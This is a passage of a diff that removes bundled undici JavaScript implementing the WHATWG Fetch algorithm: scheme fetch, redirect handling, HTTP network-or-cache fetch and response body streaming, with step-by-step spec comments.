Promise.resolve(makeNetworkError('about scheme is not supported')) - } - case 'blob:': { - if (!resolveObjectURL) { - resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) - } - - // 1. Let blobURLEntry be request’s current URL’s blob URL entry. - const blobURLEntry = requestCurrentURL(request) - - // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 - // Buffer.resolveObjectURL does not ignore URL queries. - if (blobURLEntry.search.length !== 0) { - return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) - } - - const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) - - // 2. 
If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s - // object is not a Blob object, then return a network error. - if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { - return Promise.resolve(makeNetworkError('invalid method')) - } - - // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. - const bodyWithType = safelyExtractBody(blobURLEntryObject) - - // 4. Let body be bodyWithType’s body. - const body = bodyWithType[0] - - // 5. Let length be body’s length, serialized and isomorphic encoded. - const length = isomorphicEncode(`${body.length}`) - - // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. - const type = bodyWithType[1] ?? '' - - // 7. Return a new response whose status message is `OK`, header list is - // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. - const response = makeResponse({ - statusText: 'OK', - headersList: [ - ['content-length', { name: 'Content-Length', value: length }], - ['content-type', { name: 'Content-Type', value: type }] - ] - }) - - response.body = body - - return Promise.resolve(response) - } - case 'data:': { - // 1. Let dataURLStruct be the result of running the - // data: URL processor on request’s current URL. - const currentURL = requestCurrentURL(request) - const dataURLStruct = dataURLProcessor(currentURL) - - // 2. If dataURLStruct is failure, then return a - // network error. - if (dataURLStruct === 'failure') { - return Promise.resolve(makeNetworkError('failed to fetch the data URL')) - } - - // 3. Let mimeType be dataURLStruct’s MIME type, serialized. - const mimeType = serializeAMimeType(dataURLStruct.mimeType) - - // 4. Return a response whose status message is `OK`, - // header list is « (`Content-Type`, mimeType) », - // and body is dataURLStruct’s body as a body. 
- return Promise.resolve(makeResponse({ - statusText: 'OK', - headersList: [ - ['content-type', { name: 'Content-Type', value: mimeType }] - ], - body: safelyExtractBody(dataURLStruct.body)[0] - })) - } - case 'file:': { - // For now, unfortunate as it is, file URLs are left as an exercise for the reader. - // When in doubt, return a network error. - return Promise.resolve(makeNetworkError('not implemented... yet...')) - } - case 'http:': - case 'https:': { - // Return the result of running HTTP fetch given fetchParams. - - return httpFetch(fetchParams) - .catch((err) => makeNetworkError(err)) - } - default: { - return Promise.resolve(makeNetworkError('unknown scheme')) - } - } -} - -// https://fetch.spec.whatwg.org/#finalize-response -function finalizeResponse (fetchParams, response) { - // 1. Set fetchParams’s request’s done flag. - fetchParams.request.done = true - - // 2, If fetchParams’s process response done is not null, then queue a fetch - // task to run fetchParams’s process response done given response, with - // fetchParams’s task destination. - if (fetchParams.processResponseDone != null) { - queueMicrotask(() => fetchParams.processResponseDone(response)) - } -} - -// https://fetch.spec.whatwg.org/#fetch-finale -function fetchFinale (fetchParams, response) { - // 1. If response is a network error, then: - if (response.type === 'error') { - // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». - response.urlList = [fetchParams.request.urlList[0]] - - // 2. Set response’s timing info to the result of creating an opaque timing - // info for fetchParams’s timing info. - response.timingInfo = createOpaqueTimingInfo({ - startTime: fetchParams.timingInfo.startTime - }) - } - - // 2. Let processResponseEndOfBody be the following steps: - const processResponseEndOfBody = () => { - // 1. Set fetchParams’s request’s done flag. 
- fetchParams.request.done = true - - // If fetchParams’s process response end-of-body is not null, - // then queue a fetch task to run fetchParams’s process response - // end-of-body given response with fetchParams’s task destination. - if (fetchParams.processResponseEndOfBody != null) { - queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) - } - } - - // 3. If fetchParams’s process response is non-null, then queue a fetch task - // to run fetchParams’s process response given response, with fetchParams’s - // task destination. - if (fetchParams.processResponse != null) { - queueMicrotask(() => fetchParams.processResponse(response)) - } - - // 4. If response’s body is null, then run processResponseEndOfBody. - if (response.body == null) { - processResponseEndOfBody() - } else { - // 5. Otherwise: - - // 1. Let transformStream be a new a TransformStream. - - // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, - // enqueues chunk in transformStream. - const identityTransformAlgorithm = (chunk, controller) => { - controller.enqueue(chunk) - } - - // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm - // and flushAlgorithm set to processResponseEndOfBody. - const transformStream = new TransformStream({ - start () {}, - transform: identityTransformAlgorithm, - flush: processResponseEndOfBody - }, { - size () { - return 1 - } - }, { - size () { - return 1 - } - }) - - // 4. Set response’s body to the result of piping response’s body through transformStream. - response.body = { stream: response.body.stream.pipeThrough(transformStream) } - } - - // 6. If fetchParams’s process response consume body is non-null, then: - if (fetchParams.processResponseConsumeBody != null) { - // 1. Let processBody given nullOrBytes be this step: run fetchParams’s - // process response consume body given response and nullOrBytes. 
- const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) - - // 2. Let processBodyError be this step: run fetchParams’s process - // response consume body given response and failure. - const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) - - // 3. If response’s body is null, then queue a fetch task to run processBody - // given null, with fetchParams’s task destination. - if (response.body == null) { - queueMicrotask(() => processBody(null)) - } else { - // 4. Otherwise, fully read response’s body given processBody, processBodyError, - // and fetchParams’s task destination. - return fullyReadBody(response.body, processBody, processBodyError) - } - return Promise.resolve() - } -} - -// https://fetch.spec.whatwg.org/#http-fetch -async function httpFetch (fetchParams) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let actualResponse be null. - let actualResponse = null - - // 4. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 5. If request’s service-workers mode is "all", then: - if (request.serviceWorkers === 'all') { - // TODO - } - - // 6. If response is null, then: - if (response === null) { - // 1. If makeCORSPreflight is true and one of these conditions is true: - // TODO - - // 2. If request’s redirect mode is "follow", then set request’s - // service-workers mode to "none". - if (request.redirect === 'follow') { - request.serviceWorkers = 'none' - } - - // 3. Set response and actualResponse to the result of running - // HTTP-network-or-cache fetch given fetchParams. - actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) - - // 4. If request’s response tainting is "cors" and a CORS check - // for request and response returns failure, then return a network error. 
- if ( - request.responseTainting === 'cors' && - corsCheck(request, response) === 'failure' - ) { - return makeNetworkError('cors failure') - } - - // 5. If the TAO check for request and response returns failure, then set - // request’s timing allow failed flag. - if (TAOCheck(request, response) === 'failure') { - request.timingAllowFailed = true - } - } - - // 7. If either request’s response tainting or response’s type - // is "opaque", and the cross-origin resource policy check with - // request’s origin, request’s client, request’s destination, - // and actualResponse returns blocked, then return a network error. - if ( - (request.responseTainting === 'opaque' || response.type === 'opaque') && - crossOriginResourcePolicyCheck( - request.origin, - request.client, - request.destination, - actualResponse - ) === 'blocked' - ) { - return makeNetworkError('blocked') - } - - // 8. If actualResponse’s status is a redirect status, then: - if (redirectStatusSet.has(actualResponse.status)) { - // 1. If actualResponse’s status is not 303, request’s body is not null, - // and the connection uses HTTP/2, then user agents may, and are even - // encouraged to, transmit an RST_STREAM frame. - // See, https://github.com/whatwg/fetch/issues/1288 - if (request.redirect !== 'manual') { - fetchParams.controller.connection.destroy() - } - - // 2. Switch on request’s redirect mode: - if (request.redirect === 'error') { - // Set response to a network error. - response = makeNetworkError('unexpected redirect') - } else if (request.redirect === 'manual') { - // Set response to an opaque-redirect filtered response whose internal - // response is actualResponse. - // NOTE(spec): On the web this would return an `opaqueredirect` response, - // but that doesn't make sense server side. - // See https://github.com/nodejs/undici/issues/1193. 
- response = actualResponse - } else if (request.redirect === 'follow') { - // Set response to the result of running HTTP-redirect fetch given - // fetchParams and response. - response = await httpRedirectFetch(fetchParams, response) - } else { - assert(false) - } - } - - // 9. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 10. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-redirect-fetch -function httpRedirectFetch (fetchParams, response) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let actualResponse be response, if response is not a filtered response, - // and response’s internal response otherwise. - const actualResponse = response.internalResponse - ? response.internalResponse - : response - - // 3. Let locationURL be actualResponse’s location URL given request’s current - // URL’s fragment. - let locationURL - - try { - locationURL = responseLocationURL( - actualResponse, - requestCurrentURL(request).hash - ) - - // 4. If locationURL is null, then return response. - if (locationURL == null) { - return response - } - } catch (err) { - // 5. If locationURL is failure, then return a network error. - return Promise.resolve(makeNetworkError(err)) - } - - // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network - // error. - if (!urlIsHttpHttpsScheme(locationURL)) { - return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) - } - - // 7. If request’s redirect count is 20, then return a network error. - if (request.redirectCount === 20) { - return Promise.resolve(makeNetworkError('redirect count exceeded')) - } - - // 8. Increase request’s redirect count by 1. - request.redirectCount += 1 - - // 9. If request’s mode is "cors", locationURL includes credentials, and - // request’s origin is not same origin with locationURL’s origin, then return - // a network error. 
- if ( - request.mode === 'cors' && - (locationURL.username || locationURL.password) && - !sameOrigin(request, locationURL) - ) { - return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) - } - - // 10. If request’s response tainting is "cors" and locationURL includes - // credentials, then return a network error. - if ( - request.responseTainting === 'cors' && - (locationURL.username || locationURL.password) - ) { - return Promise.resolve(makeNetworkError( - 'URL cannot contain credentials for request mode "cors"' - )) - } - - // 11. If actualResponse’s status is not 303, request’s body is non-null, - // and request’s body’s source is null, then return a network error. - if ( - actualResponse.status !== 303 && - request.body != null && - request.body.source == null - ) { - return Promise.resolve(makeNetworkError()) - } - - // 12. If one of the following is true - // - actualResponse’s status is 301 or 302 and request’s method is `POST` - // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` - if ( - ([301, 302].includes(actualResponse.status) && request.method === 'POST') || - (actualResponse.status === 303 && - !GET_OR_HEAD.includes(request.method)) - ) { - // then: - // 1. Set request’s method to `GET` and request’s body to null. - request.method = 'GET' - request.body = null - - // 2. For each headerName of request-body-header name, delete headerName from - // request’s header list. - for (const headerName of requestBodyHeader) { - request.headersList.delete(headerName) - } - } - - // 13. If request’s current URL’s origin is not same origin with locationURL’s - // origin, then for each headerName of CORS non-wildcard request-header name, - // delete headerName from request’s header list. 
- if (!sameOrigin(requestCurrentURL(request), locationURL)) { - // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name - request.headersList.delete('authorization') - - // https://fetch.spec.whatwg.org/#authentication-entries - request.headersList.delete('proxy-authorization', true) - - // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. - request.headersList.delete('cookie') - request.headersList.delete('host') - } - - // 14. If request’s body is non-null, then set request’s body to the first return - // value of safely extracting request’s body’s source. - if (request.body != null) { - assert(request.body.source != null) - request.body = safelyExtractBody(request.body.source)[0] - } - - // 15. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 16. Set timingInfo’s redirect end time and post-redirect start time to the - // coarsened shared current time given fetchParams’s cross-origin isolated - // capability. - timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = - coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) - - // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s - // redirect start time to timingInfo’s start time. - if (timingInfo.redirectStartTime === 0) { - timingInfo.redirectStartTime = timingInfo.startTime - } - - // 18. Append locationURL to request’s URL list. - request.urlList.push(locationURL) - - // 19. Invoke set request’s referrer policy on redirect on request and - // actualResponse. - setRequestReferrerPolicyOnRedirect(request, actualResponse) - - // 20. Return the result of running main fetch given fetchParams and true. - return mainFetch(fetchParams, true) -} - -// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch -async function httpNetworkOrCacheFetch ( - fetchParams, - isAuthenticationFetch = false, - isNewConnectionFetch = false -) { - // 1. Let request be fetchParams’s request. 
- const request = fetchParams.request - - // 2. Let httpFetchParams be null. - let httpFetchParams = null - - // 3. Let httpRequest be null. - let httpRequest = null - - // 4. Let response be null. - let response = null - - // 5. Let storedResponse be null. - // TODO: cache - - // 6. Let httpCache be null. - const httpCache = null - - // 7. Let the revalidatingFlag be unset. - const revalidatingFlag = false - - // 8. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If request’s window is "no-window" and request’s redirect mode is - // "error", then set httpFetchParams to fetchParams and httpRequest to - // request. - if (request.window === 'no-window' && request.redirect === 'error') { - httpFetchParams = fetchParams - httpRequest = request - } else { - // Otherwise: - - // 1. Set httpRequest to a clone of request. - httpRequest = makeRequest(request) - - // 2. Set httpFetchParams to a copy of fetchParams. - httpFetchParams = { ...fetchParams } - - // 3. Set httpFetchParams’s request to httpRequest. - httpFetchParams.request = httpRequest - } - - // 3. Let includeCredentials be true if one of - const includeCredentials = - request.credentials === 'include' || - (request.credentials === 'same-origin' && - request.responseTainting === 'basic') - - // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s - // body is non-null; otherwise null. - const contentLength = httpRequest.body ? httpRequest.body.length : null - - // 5. Let contentLengthHeaderValue be null. - let contentLengthHeaderValue = null - - // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or - // `PUT`, then set contentLengthHeaderValue to `0`. - if ( - httpRequest.body == null && - ['POST', 'PUT'].includes(httpRequest.method) - ) { - contentLengthHeaderValue = '0' - } - - // 7. If contentLength is non-null, then set contentLengthHeaderValue to - // contentLength, serialized and isomorphic encoded. 
- if (contentLength != null) { - contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) - } - - // 8. If contentLengthHeaderValue is non-null, then append - // `Content-Length`/contentLengthHeaderValue to httpRequest’s header - // list. - if (contentLengthHeaderValue != null) { - httpRequest.headersList.append('content-length', contentLengthHeaderValue) - } - - // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, - // contentLengthHeaderValue) to httpRequest’s header list. - - // 10. If contentLength is non-null and httpRequest’s keepalive is true, - // then: - if (contentLength != null && httpRequest.keepalive) { - // NOTE: keepalive is a noop outside of browser context. - } - - // 11. If httpRequest’s referrer is a URL, then append - // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, - // to httpRequest’s header list. - if (httpRequest.referrer instanceof URL) { - httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) - } - - // 12. Append a request `Origin` header for httpRequest. - appendRequestOriginHeader(httpRequest) - - // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] - appendFetchMetadata(httpRequest) - - // 14. If httpRequest’s header list does not contain `User-Agent`, then - // user agents should append `User-Agent`/default `User-Agent` value to - // httpRequest’s header list. - if (!httpRequest.headersList.contains('user-agent')) { - httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') - } - - // 15. If httpRequest’s cache mode is "default" and httpRequest’s header - // list contains `If-Modified-Since`, `If-None-Match`, - // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set - // httpRequest’s cache mode to "no-store". 
- if ( - httpRequest.cache === 'default' && - (httpRequest.headersList.contains('if-modified-since') || - httpRequest.headersList.contains('if-none-match') || - httpRequest.headersList.contains('if-unmodified-since') || - httpRequest.headersList.contains('if-match') || - httpRequest.headersList.contains('if-range')) - ) { - httpRequest.cache = 'no-store' - } - - // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent - // no-cache cache-control header modification flag is unset, and - // httpRequest’s header list does not contain `Cache-Control`, then append - // `Cache-Control`/`max-age=0` to httpRequest’s header list. - if ( - httpRequest.cache === 'no-cache' && - !httpRequest.preventNoCacheCacheControlHeaderModification && - !httpRequest.headersList.contains('cache-control') - ) { - httpRequest.headersList.append('cache-control', 'max-age=0') - } - - // 17. If httpRequest’s cache mode is "no-store" or "reload", then: - if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { - // 1. If httpRequest’s header list does not contain `Pragma`, then append - // `Pragma`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('pragma')) { - httpRequest.headersList.append('pragma', 'no-cache') - } - - // 2. If httpRequest’s header list does not contain `Cache-Control`, - // then append `Cache-Control`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('cache-control')) { - httpRequest.headersList.append('cache-control', 'no-cache') - } - } - - // 18. If httpRequest’s header list contains `Range`, then append - // `Accept-Encoding`/`identity` to httpRequest’s header list. - if (httpRequest.headersList.contains('range')) { - httpRequest.headersList.append('accept-encoding', 'identity') - } - - // 19. Modify httpRequest’s header list per HTTP. Do not append a given - // header if httpRequest’s header list contains that header’s name. 
- // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 - if (!httpRequest.headersList.contains('accept-encoding')) { - if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { - httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') - } else { - httpRequest.headersList.append('accept-encoding', 'gzip, deflate') - } - } - - httpRequest.headersList.delete('host') - - // 20. If includeCredentials is true, then: - if (includeCredentials) { - // 1. If the user agent is not configured to block cookies for httpRequest - // (see section 7 of [COOKIES]), then: - // TODO: credentials - // 2. If httpRequest’s header list does not contain `Authorization`, then: - // TODO: credentials - } - - // 21. If there’s a proxy-authentication entry, use it as appropriate. - // TODO: proxy-authentication - - // 22. Set httpCache to the result of determining the HTTP cache - // partition, given httpRequest. - // TODO: cache - - // 23. If httpCache is null, then set httpRequest’s cache mode to - // "no-store". - if (httpCache == null) { - httpRequest.cache = 'no-store' - } - - // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", - // then: - if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { - // TODO: cache - } - - // 9. If aborted, then return the appropriate network error for fetchParams. - // TODO - - // 10. If response is null, then: - if (response == null) { - // 1. If httpRequest’s cache mode is "only-if-cached", then return a - // network error. - if (httpRequest.mode === 'only-if-cached') { - return makeNetworkError('only if cached') - } - - // 2. Let forwardResponse be the result of running HTTP-network fetch - // given httpFetchParams, includeCredentials, and isNewConnectionFetch. - const forwardResponse = await httpNetworkFetch( - httpFetchParams, - includeCredentials, - isNewConnectionFetch - ) - - // 3. 
If httpRequest’s method is unsafe and forwardResponse’s status is - // in the range 200 to 399, inclusive, invalidate appropriate stored - // responses in httpCache, as per the "Invalidation" chapter of HTTP - // Caching, and set storedResponse to null. [HTTP-CACHING] - if ( - !safeMethodsSet.has(httpRequest.method) && - forwardResponse.status >= 200 && - forwardResponse.status <= 399 - ) { - // TODO: cache - } - - // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, - // then: - if (revalidatingFlag && forwardResponse.status === 304) { - // TODO: cache - } - - // 5. If response is null, then: - if (response == null) { - // 1. Set response to forwardResponse. - response = forwardResponse - - // 2. Store httpRequest and forwardResponse in httpCache, as per the - // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] - // TODO: cache - } - } - - // 11. Set response’s URL list to a clone of httpRequest’s URL list. - response.urlList = [...httpRequest.urlList] - - // 12. If httpRequest’s header list contains `Range`, then set response’s - // range-requested flag. - if (httpRequest.headersList.contains('range')) { - response.rangeRequested = true - } - - // 13. Set response’s request-includes-credentials to includeCredentials. - response.requestIncludesCredentials = includeCredentials - - // 14. If response’s status is 401, httpRequest’s response tainting is not - // "cors", includeCredentials is true, and request’s window is an environment - // settings object, then: - // TODO - - // 15. If response’s status is 407, then: - if (response.status === 407) { - // 1. If request’s window is "no-window", then return a network error. - if (request.window === 'no-window') { - return makeNetworkError() - } - - // 2. ??? - - // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 4. 
Prompt the end user as appropriate in request’s window and store - // the result as a proxy-authentication entry. [HTTP-AUTH] - // TODO: Invoke some kind of callback? - - // 5. Set response to the result of running HTTP-network-or-cache fetch given - // fetchParams. - // TODO - return makeNetworkError('proxy authentication required') - } - - // 16. If all of the following are true - if ( - // response’s status is 421 - response.status === 421 && - // isNewConnectionFetch is false - !isNewConnectionFetch && - // request’s body is null, or request’s body is non-null and request’s body’s source is non-null - (request.body == null || request.body.source != null) - ) { - // then: - - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 2. Set response to the result of running HTTP-network-or-cache - // fetch given fetchParams, isAuthenticationFetch, and true. - - // TODO (spec): The spec doesn't specify this but we need to cancel - // the active response before we can start a new one. - // https://github.com/whatwg/fetch/issues/1293 - fetchParams.controller.connection.destroy() - - response = await httpNetworkOrCacheFetch( - fetchParams, - isAuthenticationFetch, - true - ) - } - - // 17. If isAuthenticationFetch is true, then create an authentication entry - if (isAuthenticationFetch) { - // TODO - } - - // 18. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-network-fetch -async function httpNetworkFetch ( - fetchParams, - includeCredentials = false, - forceNewConnection = false -) { - assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) - - fetchParams.controller.connection = { - abort: null, - destroyed: false, - destroy (err) { - if (!this.destroyed) { - this.destroyed = true - this.abort?.(err ?? 
new DOMException('The operation was aborted.', 'AbortError')) - } - } - } - - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 4. Let httpCache be the result of determining the HTTP cache partition, - // given request. - // TODO: cache - const httpCache = null - - // 5. If httpCache is null, then set request’s cache mode to "no-store". - if (httpCache == null) { - request.cache = 'no-store' - } - - // 6. Let networkPartitionKey be the result of determining the network - // partition key given request. - // TODO - - // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise - // "no". - const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars - - // 8. Switch on request’s mode: - if (request.mode === 'websocket') { - // Let connection be the result of obtaining a WebSocket connection, - // given request’s current URL. - // TODO - } else { - // Let connection be the result of obtaining a connection, given - // networkPartitionKey, request’s current URL’s origin, - // includeCredentials, and forceNewConnection. - // TODO - } - - // 9. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If connection is failure, then return a network error. - - // 2. Set timingInfo’s final connection timing info to the result of - // calling clamp and coarsen connection timing info with connection’s - // timing info, timingInfo’s post-redirect start time, and fetchParams’s - // cross-origin isolated capability. - - // 3. If connection is not an HTTP/2 connection, request’s body is non-null, - // and request’s body’s source is null, then append (`Transfer-Encoding`, - // `chunked`) to request’s header list. - - // 4. 
Set timingInfo’s final network-request start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated - // capability. - - // 5. Set response to the result of making an HTTP request over connection - // using request with the following caveats: - - // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] - // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] - - // - If request’s body is non-null, and request’s body’s source is null, - // then the user agent may have a buffer of up to 64 kibibytes and store - // a part of request’s body in that buffer. If the user agent reads from - // request’s body beyond that buffer’s size and the user agent needs to - // resend request, then instead return a network error. - - // - Set timingInfo’s final network-response start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated capability, - // immediately after the user agent’s HTTP parser receives the first byte - // of the response (e.g., frame header bytes for HTTP/2 or response status - // line for HTTP/1.x). - - // - Wait until all the headers are transmitted. - - // - Any responses whose status is in the range 100 to 199, inclusive, - // and is not 101, are to be ignored, except for the purposes of setting - // timingInfo’s final network-response start time above. - - // - If request’s header list contains `Transfer-Encoding`/`chunked` and - // response is transferred via HTTP/1.0 or older, then return a network - // error. - - // - If the HTTP request results in a TLS client certificate dialog, then: - - // 1. If request’s window is an environment settings object, make the - // dialog available in request’s window. - - // 2. Otherwise, return a network error. - - // To transmit request’s body body, run these steps: - let requestBody = null - // 1. 
If body is null and fetchParams’s process request end-of-body is - // non-null, then queue a fetch task given fetchParams’s process request - // end-of-body and fetchParams’s task destination. - if (request.body == null && fetchParams.processRequestEndOfBody) { - queueMicrotask(() => fetchParams.processRequestEndOfBody()) - } else if (request.body != null) { - // 2. Otherwise, if body is non-null: - - // 1. Let processBodyChunk given bytes be these steps: - const processBodyChunk = async function * (bytes) { - // 1. If the ongoing fetch is terminated, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. Run this step in parallel: transmit bytes. - yield bytes - - // 3. If fetchParams’s process request body is non-null, then run - // fetchParams’s process request body given bytes’s length. - fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) - } - - // 2. Let processEndOfBody be these steps: - const processEndOfBody = () => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If fetchParams’s process request end-of-body is non-null, - // then run fetchParams’s process request end-of-body. - if (fetchParams.processRequestEndOfBody) { - fetchParams.processRequestEndOfBody() - } - } - - // 3. Let processBodyError given e be these steps: - const processBodyError = (e) => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. - if (e.name === 'AbortError') { - fetchParams.controller.abort() - } else { - fetchParams.controller.terminate(e) - } - } - - // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, - // processBodyError, and fetchParams’s task destination. 
- requestBody = (async function * () { - try { - for await (const bytes of request.body.stream) { - yield * processBodyChunk(bytes) - } - processEndOfBody() - } catch (err) { - processBodyError(err) - } - })() - } - - try { - // socket is only provided for websockets - const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) - - if (socket) { - response = makeResponse({ status, statusText, headersList, socket }) - } else { - const iterator = body[Symbol.asyncIterator]() - fetchParams.controller.next = () => iterator.next() - - response = makeResponse({ status, statusText, headersList }) - } - } catch (err) { - // 10. If aborted, then: - if (err.name === 'AbortError') { - // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. - fetchParams.controller.connection.destroy() - - // 2. Return the appropriate network error for fetchParams. - return makeAppropriateNetworkError(fetchParams, err) - } - - return makeNetworkError(err) - } - - // 11. Let pullAlgorithm be an action that resumes the ongoing fetch - // if it is suspended. - const pullAlgorithm = () => { - fetchParams.controller.resume() - } - - // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s - // controller with reason, given reason. - const cancelAlgorithm = (reason) => { - fetchParams.controller.abort(reason) - } - - // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by - // the user agent. - // TODO - - // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object - // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. - // TODO - - // 15. Let stream be a new ReadableStream. - // 16. Set up stream with pullAlgorithm set to pullAlgorithm, - // cancelAlgorithm set to cancelAlgorithm, highWaterMark set to - // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. 
- if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - const stream = new ReadableStream( - { - async start (controller) { - fetchParams.controller.controller = controller - }, - async pull (controller) { - await pullAlgorithm(controller) - }, - async cancel (reason) { - await cancelAlgorithm(reason) - } - }, - { - highWaterMark: 0, - size () { - return 1 - } - } - ) - - // 17. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. Set response’s body to a new body whose stream is stream. - response.body = { stream } - - // 2. If response is not a network error and request’s cache mode is - // not "no-store", then update response in httpCache for request. - // TODO - - // 3. If includeCredentials is true and the user agent is not configured - // to block cookies for request (see section 7 of [COOKIES]), then run the - // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on - // the value of each header whose name is a byte-case-insensitive match for - // `Set-Cookie` in response’s header list, if any, and request’s current URL. - // TODO - - // 18. If aborted, then: - // TODO - - // 19. Run these steps in parallel: - - // 1. Run these steps, but abort when fetchParams is canceled: - fetchParams.controller.on('terminated', onAborted) - fetchParams.controller.resume = async () => { - // 1. While true - while (true) { - // 1-3. See onData... - - // 4. Set bytes to the result of handling content codings given - // codings and bytes. - let bytes - let isFailure - try { - const { done, value } = await fetchParams.controller.next() - - if (isAborted(fetchParams)) { - break - } - - bytes = done ? undefined : value - } catch (err) { - if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { - // zlib doesn't like empty streams. - bytes = undefined - } else { - bytes = err - - // err may be propagated from the result of calling readablestream.cancel, - // which might not be an error. 
https://github.com/nodejs/undici/issues/2009 - isFailure = true - } - } - - if (bytes === undefined) { - // 2. Otherwise, if the bytes transmission for response’s message - // body is done normally and stream is readable, then close - // stream, finalize response for fetchParams and response, and - // abort these in-parallel steps. - readableStreamClose(fetchParams.controller.controller) - - finalizeResponse(fetchParams, response) - - return - } - - // 5. Increase timingInfo’s decoded body size by bytes’s length. - timingInfo.decodedBodySize += bytes?.byteLength ?? 0 - - // 6. If bytes is failure, then terminate fetchParams’s controller. - if (isFailure) { - fetchParams.controller.terminate(bytes) - return - } - - // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes - // into stream. - fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) - - // 8. If stream is errored, then terminate the ongoing fetch. - if (isErrored(stream)) { - fetchParams.controller.terminate() - return - } - - // 9. If stream doesn’t need more data ask the user agent to suspend - // the ongoing fetch. - if (!fetchParams.controller.controller.desiredSize) { - return - } - } - } - - // 2. If aborted, then: - function onAborted (reason) { - // 2. If fetchParams is aborted, then: - if (isAborted(fetchParams)) { - // 1. Set response’s aborted flag. - response.aborted = true - - // 2. If stream is readable, then error stream with the result of - // deserialize a serialized abort reason given fetchParams’s - // controller’s serialized abort reason and an - // implementation-defined realm. - if (isReadable(stream)) { - fetchParams.controller.controller.error( - fetchParams.controller.serializedAbortReason - ) - } - } else { - // 3. Otherwise, if stream is readable, error stream 